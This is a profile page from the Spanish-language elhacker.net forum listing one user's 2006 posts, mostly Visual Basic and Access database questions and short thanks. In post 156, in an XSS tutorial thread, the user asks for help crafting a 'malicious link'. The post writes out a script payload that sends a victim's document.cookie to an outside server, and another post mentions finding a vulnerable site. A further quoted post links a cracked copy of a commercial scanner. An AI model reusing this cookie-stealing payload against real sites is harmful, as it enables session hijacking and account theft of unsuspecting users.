elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16]
151  Programación / Programación Visual Basic / Re: acceso a la base de datos ...???? en: 6 Octubre 2006, 03:01 am
de todos modos muchas gracias el brother que me contesto..... todavia sigo con la duda alguien que sepa por favor que postee algo
152  Programación / Programación Visual Basic / Re: acceso a la base de datos ...???? en: 4 Octubre 2006, 02:10 am
esta bien....... pero para hacer el servidor \\Servidor\dir\foto.jpg pero el problema que les digo que es en access.. no es sql....


y gracias por responderme...  pero todavia sigo con la duda
153  Programación / Programación Visual Basic / acceso a la base de datos ...???? en: 1 Octubre 2006, 18:39 pm
hola muchachos es que estoy haciendo un soft de base de datos pero y me gustaria usarla en una lan...

entocnes como puedo hacer una consulta de un cliente a un servidor pero la base de datos es en access.... tambien me gustaria saber como editar desde el cliente la base de datos del servidor....

otra cosa como puedo cargr una foto que esta en el servidor osea en una carpeta para verla en un picture box pero en el cliente....

bueno nos vemos y muchas gracias de antemano....
154  Programación / Programación Visual Basic / jalando una foto del cliente... en: 26 Septiembre 2006, 03:42 am
hola muchachos ustedes sabe bastante y me gustaria que ayudaran en un incomveniente que tengo...


hice un soft en visual basic pero necesito tener acceso a una foto...

servidor(la base de datos)>>>>>>>>> cliente

lo que quiero hacer es jalar una foto que esta en el servidor y ponerla en cliente.....

otra cosa como hago para hacer una notificacion ... es un programa
155  Informática / Tutoriales - Documentación / Re: Intrusion sistemas por NETBIOS, by Zero Byte en: 10 Agosto 2006, 07:24 am
buen tuto... gracias.... ;D ;D ;D ;D
156  Informática / Tutoriales - Documentación / Re: [::Tutorial::] - Ataques XSS en: 7 Agosto 2006, 07:16 am

gracias.. ;D ;D


ademas de eso quiero que me ayuden hacer un link maligno..


Código:
                  <td align="center"><p>Buscar Blogs</p></td>
                </tr>
                <tr>
                  <td align="center"><input id="keyword" name="keyword" size="10" type="text" /></td>
                </tr>
                <tr>
                  <td align="center"><input name="submit" type="submit" value="Buscar" /><

http://www.victima.com/?Keyword=<script>window.location='http://server/cookies.php?cookie='+document.cookie;</script>&buscar=;


la victima no tiene buscador.php sino que en la pagina principal esta el buscador... si es ese el enlace digame sino pues me puede corregir
157  Informática / Tutoriales - Documentación / Re: [::Tutorial::] - Ataques XSS en: 7 Agosto 2006, 07:07 am
mi pregunta es si no hay en el red una pagina para pasar de accsi a hexadecimales.. asi es mas rapido porque encontre una web vulnerable.. jijijiji ;D ;D ;D
158  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Re: Llamar a celulares gratis desde Internet? en: 7 Agosto 2006, 06:50 am
interesante ... ;D ;D ;D
159  Seguridad Informática / Nivel Web / Re: Escaner de vulnerabilidades PHP/XSS/SQL Inject en: 15 Julio 2006, 06:23 am
Buenas tardes y saludos a todos

Bueno aki tienen el Acunetix 3.0 con su crack por si no le van los otros linck (a mi no me van  :-X :-[)

Estan en el rapidshare como pueden ver

http://rapidshare.de/files/20724892/Acutenix_3___crack.zip.html

Salu2


provando... mmmm... cuidado le metes algun troyano...
160  Programación / Ingeniería Inversa / Re: DESCOMPILAR UN EXE en: 5 Julio 2006, 06:08 am
interesante la pagina......
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines